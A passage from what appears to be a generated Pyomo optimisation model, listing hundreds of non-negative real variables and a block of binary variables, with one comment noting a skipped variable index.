m.x177 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x178 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x179 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x180 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x181 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x182 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x183 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x184 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x185 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x186 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x187 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x188 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x189 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x190 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x191 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x192 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x193 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x194 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x195 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x196 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x197 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x198 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x199 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x200 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x201 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x202 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x203 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x204 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x205 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x206 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x207 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x208 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x209 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x210 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x211 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x212 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x213 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x214 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x215 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x216 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x217 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x218 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x219 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x220 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x221 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x222 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x223 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x224 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x225 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x226 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x227 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x228 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x229 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x230 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x231 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x232 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x233 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x234 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x235 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x236 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x237 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x238 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x239 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x240 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x241 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x242 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x243 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x244 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x245 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x246 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x247 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x248 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x249 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x250 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x251 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x252 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x253 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x254 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x255 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x256 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x257 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x258 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x259 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x260 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x261 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x262 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x263 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x264 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x265 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x266 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x267 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x268 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x269 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x270 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x271 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x272 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x273 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x274 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x275 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x276 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x277 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x278 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x279 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x280 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x281 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x282 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x283 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x284 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x285 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x286 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x287 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x288 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x289 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x290 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x291 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x292 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x293 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x294 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x295 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x296 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x297 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x298 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x299 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x300 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x301 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x302 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x303 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x304 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x305 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x306 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x307 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x308 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x309 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x310 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x311 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x312 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x313 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x314 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x315 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x316 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x317 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x318 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x319 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x320 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x321 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x322 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x323 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x324 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x325 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x326 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x327 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x328 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x329 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x330 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x331 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x332 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x333 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x334 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x335 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x336 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x337 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x338 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x339 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x340 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x341 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x342 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x343 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x344 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x345 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x346 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x347 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x348 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x349 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x350 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x351 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x352 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x353 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x354 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x355 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x356 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x357 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x358 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x359 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x360 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x361 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x362 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x363 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x364 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x365 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x366 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x367 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x368 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x369 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x370 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x371 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x372 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x373 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x374 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x375 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x376 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x377 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x378 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x379 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x380 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x381 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x382 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x383 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x384 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x385 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x386 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x387 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x388 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x389 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x390 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x391 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x392 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x393 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x394 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x395 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x396 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x397 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x398 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x399 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x400 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x401 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x402 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x403 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x404 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x405 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x406 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x407 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x408 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x409 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x410 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x411 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x412 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x413 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x414 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x415 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x416 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x417 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x418 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x419 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x420 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x421 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x422 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x423 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x424 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x425 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x426 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x427 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x428 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x429 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x430 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x431 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x432 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x433 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x434 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x435 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x436 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x437 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x438 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x439 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x440 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x441 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x442 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x443 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x444 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x445 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x446 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x447 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x448 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x449 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x450 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x451 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x452 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x453 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x454 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x455 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x456 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x457 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x458 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x459 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x460 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x461 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x462 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x463 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x464 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x465 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x466 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x467 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x468 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x469 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x470 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x471 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x472 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x473 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x474 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x475 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x476 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x477 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x478 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x479 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x480 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x481 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x482 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x483 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x484 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x485 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x486 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x487 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x488 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x489 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x490 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x491 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x492 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x493 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x494 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x495 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x496 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x497 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x498 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x499 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x500 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x501 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x502 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x503 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x504 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x505 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x506 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x507 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x508 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x509 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x510 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x511 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x512 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x513 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x514 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x515 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x516 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x517 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x518 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x519 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x520 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x521 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x522 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x523 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x524 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x525 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x526 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x527 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x528 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x529 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x530 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x531 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x532 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x533 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x534 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x535 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x536 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x537 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x538 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x539 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x540 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x541 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x542 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x543 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x544 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x545 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x546 = Var(within=Reals,bounds=(0,None),initialize=0)
m.b547 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b548 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b549 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b550 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b551 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b552 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b553 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b554 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b555 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b556 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b557 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b558 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b559 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b560 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b561 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b562 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b563 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b564 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b565 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b566 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b567 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b568 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b569 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b570 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b571 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b572 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b573 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b574 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b575 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b576 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b577 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b578 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b579 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b580 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b581 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b582 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b583 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b584 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b585 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b586 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b587 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b588 = Var(within=Binary,bounds=(0,1),initialize=0)
m.x589 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x590 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x591 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x592 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x593 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x594 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x595 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x596 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x597 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x598 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x599 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x600 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x601 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x602 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x603 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x604 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x605 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x606 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x607 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x608 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x609 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x610 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x611 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x612 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x613 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x614 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x615 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x616 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x617 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x618 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x619 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x620 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x621 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x622 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x623 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x624 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x625 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x626 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x627 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x628 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x629 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x630 = Var(within=Reals,bounds=(0,None),initialize=0)
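# (x631 is skipped here: the header notes the reformulation removed one variable)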
m.x632 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x633 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x634 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x635 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x636 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x637 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x638 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x639 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x640 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x641 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x642 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x643 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x644 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x645 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x646 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x647 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x648 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x649 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x650 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x651 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x652 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x653 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x654 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x655 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x656 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x657 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x658 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x659 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x660 = Var(within=Reals,bounds=(0,None),initialize=0)
